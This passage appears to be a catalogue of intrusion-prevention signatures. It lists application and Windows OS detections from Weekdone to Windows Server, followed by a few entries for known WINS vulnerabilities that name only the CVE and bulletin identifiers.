Last changed: sgpkg-ips-1678-5242
Description: Weekdone hassle-free weekly employee status reports. Automatically collect plans, progress and problems from team members. Compile weekly reports.
Back to top

Weemss

About this situation: Application Weemss detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Weemss - ticketing and event registration software, designed to provide more control to event organizers by allowing them to communicate directly with their clients.
Back to top

Weidenhammer

About this situation: Application Weidenhammer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Weidenhammer is a company that provides information technology.
Back to top

Weight-Watchers

About this situation: Application Weight-Watchers detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Weight Watchers International is an international company that offers various products and services to assist weight loss and maintenance.
Back to top

Wepay

About this situation: WePay usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: WePay is an online payment service provider in the United States. WePay payment API focuses exclusively on platform businesses such as crowdfunding sites, marketplaces and small business software. Through this API, WePay allows these platforms to access its payments capabilities and process credit cards for the platform's users.
Back to top

WestHost

About this situation: Application WestHost detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WestHost is a professional web hosting company. It offers professional and affordable website hosting plans.
Back to top

Westlaw

About this situation: Application Westlaw detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Westlaw is one of the primary online legal research services for lawyers and legal professionals in the United States and is a part of West. In addition, it provides proprietary database services.
Back to top

WestMonroe

About this situation: Application WestMonroe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: WestMonroe help generate revenue, reduce costs and transform your thinking, operations, and capabilities.
Back to top

Wesupply

About this situation: Application Wesupply detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wesupply provides business-to-business integration and supply chain collaboration solutions for retailers and manufacturers.
Back to top

WeThrive

About this situation: Application WeThrive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WeThrive enables organisations of all sizes to understand how close to that ideal state each person feels, where the opportunities are to improve it and action plans to make the change.
Back to top

WeTransfer

About this situation: WeTransfer usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1646-5242
Description: This service allows users to transfer a variety of file types and sizes.
Back to top

WeVideo

About this situation: Application WeVideo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WeVideo is online video creation platform for video editing, collaboration, and sharing across iPhone, iPad, Android, Chromebook, MAC, PC.
Back to top

WFMwizard

About this situation: Application WFMwizard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WFMwizard offers to automate call center operations planning cycle: accurately forecast inbound call volumes, calculate agents staffing levels needed, optimize shifts structure design, roster agents.
Back to top

WhatCounts

About this situation: Application WhatCounts detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WhatCounts, Inc. operates as an email marketing company. It provides data management, software, and services to marketing professionals seeking to deliver personalized digital messages to their target audiences.
Back to top

Whatfix

About this situation: Application Whatfix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Whatfix enhances self-service capability of web products and helps companies to reduce support queries and improve user engagement.
Back to top

WhatsApp

About this situation: WhatsApp usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-552-5211
Last changed: sgpkg-ips-1802-5242
Description: WhatsApp Messenger is a proprietary, cross-platform instant messaging subscription service for smartphones.
Back to top

WhatUsersDo

About this situation: Application WhatUsersDo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WhatUsersDo operates a remote user experience testing platform for customers. Company offers Unlimited Testing for designing, launching, and analyzing tests using platform, Research Service User Experience, Testing for digital professionals, and User Experience Testing for digital agencies.
Back to top

When-I-Work

About this situation: Application When-I-Work detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: When I Work is a mobile employee scheduling platform that is reinventing workforce management for SMBs through a blend of collaborative communication technologies including the web, mobile apps, text messaging, social media, and email.
Back to top

WhenToWork

About this situation: Application WhenToWork detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WhenToWork is a provider of Employee Scheduling system that keeps your employees happy and saves you time and money.
Back to top

Whisbi

About this situation: Application Whisbi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Whisbi is a global provider of innovative Software as a Service solutions helping companies sell more online and over the phone.
Back to top

White-Source-Software

About this situation: Application White-Source-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: White Source Software - online service for tracking, approving and auditing your open source licenses
Back to top

WhiteHat

About this situation: Application WhiteHat detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WhiteHat Security is a provider of website risk management solutions. WhiteHat Security combines technology and human intelligence to deliver powerful solutions for application security.
Back to top

WhitePages

About this situation: Application WhitePages detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WhitePages is a provider of identity information for people and businesses, and a developer of mobile apps and business services.
Back to top

WHMCS

About this situation: Application WHMCS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WHMCS is the web hosting automation platform. Handling signups, provisioning, billing and support, WHMCS puts you firmly in control of your business.
Back to top

Who's-Calling

About this situation: Application Who's-Calling detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Who
Back to top

Whos.Amung.Us

About this situation: Application Whos.Amung.Us detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Whos.Amung.Us is an online platform that offers widgets that provide real-time analytics on various websites and blogs.
Back to top

WhosOff

About this situation: Application WhosOff detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WhosOff allows you to bring your own company staffing policies to a system where your employees can plan their leave around your company calendar.
Back to top

WHOSOFFICE

About this situation: Application WHOSOFFICE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Make managing staff easier with the WhosOffice platform. From shift planning to leave management, accruals to leave policies we have it covered.
Back to top

WhosOn

About this situation: Application WhosOn detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WhosOn is a live chat. It allows track, chat and engage with customers in real-time on website with live chat solution for businesses.
Back to top

Wickr

About this situation: Wickr traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1638-5242
Description: Wickr is an instant messenger application that allows users to exchange end-to-end encrypted and self-destructing messages, including photos and file attachments. The application relies on a client server model.
Back to top

Widen

About this situation: Application Widen detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Widen is a marketing technology company. It delivers configurable, scalable management solutions to help store, search and share digital content.
Back to top

Wideo

About this situation: Application Wideo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wideo is an online video creation platform that enables users to create, edit, and share online videos.
Back to top

Wiggio

About this situation: Application Wiggio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wiggio is an online group collaboration tool. It provides private groups with an easy way to schedule, share content, plan, conference and communicate in real-time.
Back to top

Wikia

About this situation: Wikia usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-943-5242
Last changed: sgpkg-ips-943-5242
Description: Wikia is a site which hosts a large variety of fandom related wikis.
Back to top

Wikibooks

About this situation: Wikibooks usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Wikibooks is a Wikimedia community creating a free library of educational textbooks that anyone can edit.
Back to top

Wikidot

About this situation: Wikidot usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-533-5211
Last changed: sgpkg-ips-630-5211
Description: Wikidot is a wiki hosting service which provides wiki publishing, collaboration and communication solutions.
Back to top

Wikimapia

About this situation: Wikimapia usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Description: Wikimapia is an online digital collaborative map service.
Back to top

Wikimedia-Commons

About this situation: Wikimedia Commons usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-595-5211
Description: Wikimedia Commons usage has been detected. Wikimedia operates several online collaborative wiki projects including Wikipedia, Wiktionary, Wikiquote and Wikibooks.
Back to top

Wikinews

About this situation: Wikinews usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Wikinews is a free-content news source wiki and a project of the Wikimedia Foundation. Source: Wikipedia
Back to top

Wikipedia

About this situation: Wikipedia usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1656-5242
Description: Wikipedia usage has been detected. Wikipedia is a multilingual, web-based, free-content encyclopedia project based on an openly editable model.
Back to top

Wikiquote

About this situation: Wikiquote usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Wikiquote is a free online compendium of sourced quotations from notable people and creative works in every language, translations of non-English quotes, and links to Wikipedia for further information. Source: Wikipedia
Back to top

Wikisource

About this situation: Wikisource usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Wikisource is an online digital library of free content textual sources on a wiki, operated by the Wikimedia Foundation. Source: Wikipedia
Back to top

Wikispaces

About this situation: Wikispaces usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site offers private wikis with advanced features for businesses, non-profits, and educators. Source: Wikipedia
Back to top

Wikispecies

About this situation: Wikispecies usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Wikispecies is a wiki-based online project supported by the Wikimedia Foundation.
Back to top

Wikitree

About this situation: WikiTree usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users to compile and store family information.
Back to top

Wikiversity

About this situation: Wikiversity usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Wikiversity is a Wikimedia Foundation project that supports learning communities, their learning materials, and resulting activities. Source: Wikipedia
Back to top

Wiktionary

About this situation: Wiktionary usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-595-5211
Description: Wiktionary is a multilingual, web-based project to create a free content dictionary of all words in all languages.
Back to top

Wild-West-Domains-Reseller

About this situation: Application Wild-West-Domains-Reseller detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WildWestDomains - domain name registration service.
Back to top

WildFire

About this situation: Application WildFire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WildFire is a full service advertising and marketing agency. Strategic planning, interactive, sports and event marketing, broadcast production, campaign planning and execution, social media, art direction and design, copywriting, market research, marketing to women, media buying and planning, public relations.
Back to top

Wildstar-Online

About this situation: Application Wildstar-Online detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WildStar is a fantasy science fiction massively multiplayer online role-playing game.
Back to top

Willis-Towers-Watson

About this situation: Application Willis-Towers-Watson detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Willis Towers Watson is a advisory, broking and solutions company that helps clients.
Back to top

Wimi

About this situation: Application Wimi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wimi is a cloud-based management collaboration tool that gives users a secure, online space for efficiently coordinating projects by sharing and synchronizing work documents, tasks, and calendars across multiple devices and applications.
Back to top

Wimp

About this situation: WiMP usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: A video sharing website
Back to top

WinAir

About this situation: Application WinAir detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WinAir is structurally integrated maintenance and inventory control software system in the aviation industry.
Back to top

Winamax

About this situation: Winamax usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users to play poker online.
Back to top

Winamp

About this situation: Endpoint Context Agent based Winamp detection
Context: EI Correlation
Severity: 1
Tags: Streaming Media, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Nullsoft Winamp endpoint application has been detected.
Back to top

Winamp

About this situation: WinAmp usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1010-5242
Description: A proprietary multimedia framework Nullsoft, now a subsidiary of AOL; Source Wikipedia
Back to top

Winamp-Remote

About this situation: Winamp Remote usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-630-5211
Description: Winamp Remote is a utility to stream the audio content on a computer through the Internet.
Back to top

Windows 10

About this situation: ECA based Windows 10 detection
Context: ECA OS Correlation
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Windows 10 client operating system has been detected.
Back to top

Windows 10 Update Assistant

About this situation: Endpoint Context Agent based Windows 10 Update Assistant detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1074-5242
Description: A network connection launched by the Windows 10 Update Assistant was detected. Windows 10 Update Assistant downloads and installs the latest version of Windows 10.
Back to top

Windows 11

About this situation: ECA based Windows 11 detection
Context: ECA OS Correlation
Severity: 1
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Description: Windows 11 client operating system has been detected.
Back to top

Windows 7

About this situation: ECA based Windows 7 detection
Context: ECA OS Correlation
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Windows 7 client operating system has been detected.
Back to top

Windows 8

About this situation: ECA based Windows 8 detection
Context: ECA OS Correlation
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Windows 8 client operating system has been detected.
Back to top

Windows 8.1

About this situation: ECA based Windows 8.1 detection
Context: ECA OS Correlation
Severity: 1
First detected in: sgpkg-ips-990-5242
Last changed: sgpkg-ips-990-5242
Description: Windows 8.1 client operating system has been detected.
Back to top

Windows Activation Technologies Service

About this situation: Endpoint Context Agent based Windows Activation Technologies Service detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1093-5242
Description: Windows Activation Technologies Service endpoint application detected. Windows Activation Technologies Service is an attempt from Microsoft to verify the license for Windows 7.
Back to top

Windows ContactSupport

About this situation: Endpoint Context Agent based ContactSupport detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description: ConatctSupport endpoint application detected. ContactSupport is an application in Microsoft Windows used for contacting Microsoft Support.
Back to top

Windows Diagnostics Tracking

About this situation: Endpoint Context Agent based Diagnostics Tracking detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-992-5242
Description: Windows Diagnostics Tracking endpoint application was detected. Diagnostics Tracking is provides telemetry and diagnostic data from the operating system to Microsoft.
Back to top

Windows Error Reporting

About this situation: Endpoint Context Agent based Windows Error Reporting detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: A network connection launched by the Windows system error reporting process was detected.
Back to top

Windows Installer

About this situation: Endpoint Context Agent based Windows Installer detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Windows Installer endpoint application detected. Windows Installer can be used for installing, maintaining and removing software.
Back to top

Windows Kernel

About this situation: Endpoint Context Agent based Windows Kernel detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1106-5242
Last changed: sgpkg-ips-1106-5242
Description: A network connection launched by the Windows NT Operating System Kernel was detected.
Back to top

Windows Script Host

About this situation: Endpoint Context Agent based Windows Script Host detection
Context: EI Correlation
Severity: 1
Tags: Framework, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-989-5242
Description: Windows Script Host endpoint application detected. Windows Script Host is a language-independent scripting host for Windows Script compatible scripting engines.
Back to top

Windows Search

About this situation: Endpoint Context Agent based Windows Search detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-986-5242
Description: Windows Search endpoint application detected. Windows Search is used to make file searching faster on Microsoft Windows.
Back to top

Windows Server 2012

About this situation: ECA based Windows Server 2012 detection
Context: ECA OS Correlation
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Windows Server 2012 client operating system has been detected.
Back to top

Windows Server 2012 R2

About this situation: ECA based Windows Server 2012 R2 detection
Context: ECA OS Correlation
Severity: 1
First detected in: sgpkg-ips-1098-5242
Last changed: sgpkg-ips-1098-5242
Description: Windows Server 2012 R2 client operating system has been detected.
Back to top

Windows Server 2016

About this situation: ECA based Windows Server 2016 detection
Context: ECA OS Correlation
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Windows Server 2016 client operating system has been detected.
Back to top

Windows Server 2019

About this situation: ECA based Windows Server 2019 detection
Context: ECA OS Correlation
Severity: 1
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Description: Windows Server 2019 client operating system has been detected.
Back to top

Windows Server 2022

About this situation: ECA based Windows Server 2022 detection
Context: ECA OS Correlation
Severity: 1
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Description: Windows Server 2022 client operating system has been detected.
Back to top

Windows Store

About this situation: Endpoint Context Agent based Windows Store detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Windows Store endpoint application detected. Windows Store is an app store distributed with Windows operating system, starting from Windows 8.
Back to top

Windows Store Broker

About this situation: Endpoint Context Agent based Windows Store Broker detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-992-5242
Description: Windows Store Broker (WSHost.exe) endpoint application was detected. Store Broker provides centralized Windows Store authentatication and licensing service for local applications in Microsoft Windows.
Back to top

Windows System Settings

About this situation: Endpoint Context Agent based Windows System Settings detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-992-5242
Description: Microsoft Windows System Settings endpoint application was detected. System Settings application takes care of the basic user configurable system settings on Microsoft Windows.
Back to top

Windows User Account Control Panel Host

About this situation: Endpoint ECA based Windows User Account Control Panel Host detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-992-5242
Description: Microsoft Windows User Account Control Panel endpoint application was detected.
Back to top

Windows Web Application

About this situation: Endpoint Context Agent based Windows Web Application detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: A network connection launched by the Windows system process Windows Web Application Host (WWAHost) was detected. WWAHost is used by some Metro applications on Microsoft Windows.
Back to top

Windows-Live-Devices

About this situation: Windows Live Devices usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1024-5242
Description: Windows Live Devices is an online device management service which allows users to centrally access and manage the synchronisation of files stored on their computers, mobile devices, as well as other peripherals such as digital photo frames.
Back to top

Windows-Live-Mesh

About this situation: Windows Live Mesh usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: Windows Live Mesh (formerly known as Live Mesh, Windows Live Sync and Windows Live FolderShare.Windows Live Sync allows files and folders between two or more computers be in sync with each other.Source: Wikipedia
Back to top

Windows-Live-Spaces

About this situation: Windows Live Spaces usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1552-5242
Description: Windows Live Spaces usage has been detected.
Back to top

Windows-Phone-Store

About this situation: Windows Phone Store usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1238-5242
Description: This site is a digital distribution platform developed by Microsoft for its Windows Phone platform that allows users to browse and download applications that have been developed by third-parties. Source: Wikipedia
Back to top

Windows-Search-Assistant

About this situation: Windows Search Assistant usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-595-5211
Description: Windows Search Assistant usage has been detected.
Back to top

Windows-Update-Delivery-Optimization

About this situation: Windows Update Delivery Optimization traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1158-5242
Last changed: sgpkg-ips-1237-5242
Description: Windows Update Delivery Optimization is used to download Windows updates and Microsoft Store apps efficiently.
Back to top

WindsCRM

About this situation: Application WindsCRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Winds CRM - end-to-end e-business Ecommerce CRM.
Back to top

Windstream-Business

About this situation: Application Windstream-Business detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Windstream Business is provider of IP-based voice and data, MPLS networking, data center, cloud computing and managed hosting services and systems.
Back to top

Windward-Studios

About this situation: Application Windward-Studios detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Windward provides software OEMs with a reporting component and document generation component for .NET or Java.
Back to top

Winkflash

About this situation: Application Winkflash detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Winkflash is a provider of photo printing services
Back to top

Winnebago-Industries

About this situation: Application Winnebago-Industries detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Winnebago Industries is a manufacturer of motor homes, a type of recreational vehicle.
Back to top

WinSCP

About this situation: Endpoint Context Agent based WinSCP
Context: EI Correlation
Severity: 1
Tags: File Transfer, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: WinSCP endpoint application has been detected.
Back to top

WINS_Buffer-Overflow-2-MS09-039

About this situation: WINS buffer overflow vulnerability
Context: WINS TCP Client Stream
Severity: 7
Tags: Windows 2000, Windows 2003, x86, MS2009-08, CVE2009, Windows 2000 not specific, Windows 2003 not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-237-3038
Last changed: sgpkg-ips-237-3038
Vulnerability: WINS-Buffer-Overflow-2-MS09-039
Description:
Back to top

WINS_Buffer-Overflow-MS09-039

About this situation: WINS buffer overflow vulnerability
Context: WINS TCP Client Stream
Severity: 7
Tags: Windows 2000, Windows 2003, x86, MS2009-08, CVE2009, Windows 2000 not specific, Windows 2003 not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-237-3038
Last changed: sgpkg-ips-237-3038
Vulnerability: WINS-Buffer-Overflow-MS09-039
Description:
Back to top

WINS_CS-Microsoft-WINS-Memory-Overwrite-CVE-2008-1451

About this situation: An attempt to exploit a vulnerability in Microsoft WINS Service
Context: WINS TCP Client Stream
Severity: 7
Tags: Windows 2000, Windows 2003, Any Hardware, MS2008-06, CVE2008, Windows 2000 not specific, Windows 2003 not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-346-4219
Vulnerability: Microsoft-WINS-Memory-Overwrite-CVE-2008-1451
Description:
Back to top

WINS_CS-Microsoft-WINS-Service-Failed-Response-CVE-2011-1248

About this situation: An attempt to exploit a vulnerability in Microsoft WINS Service
Context: WINS TCP Client Stream
Severity: 7
Tags: Windows 2003, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-05, CVE2011, Windows 2003 not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-390-4219
Last changed: sgpkg-ips-390-4219
Vulnerability: Microsoft-WINS-Service-Failed-Response-CVE-2011-1248
Description:
Back to top

WINS_Replication-Packet-BOF-System-Compromise

About this situation: WINS replication packet association context vulnerability
Context: WINS TCP Client Stream
Severity: 10
Tags: Windows NT, Windows 2000, Windows 2003, x86, MS2004-12, CVE2004, Windows NT not specific, Windows 2000 not specific, Windows 2003 not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-371-4219
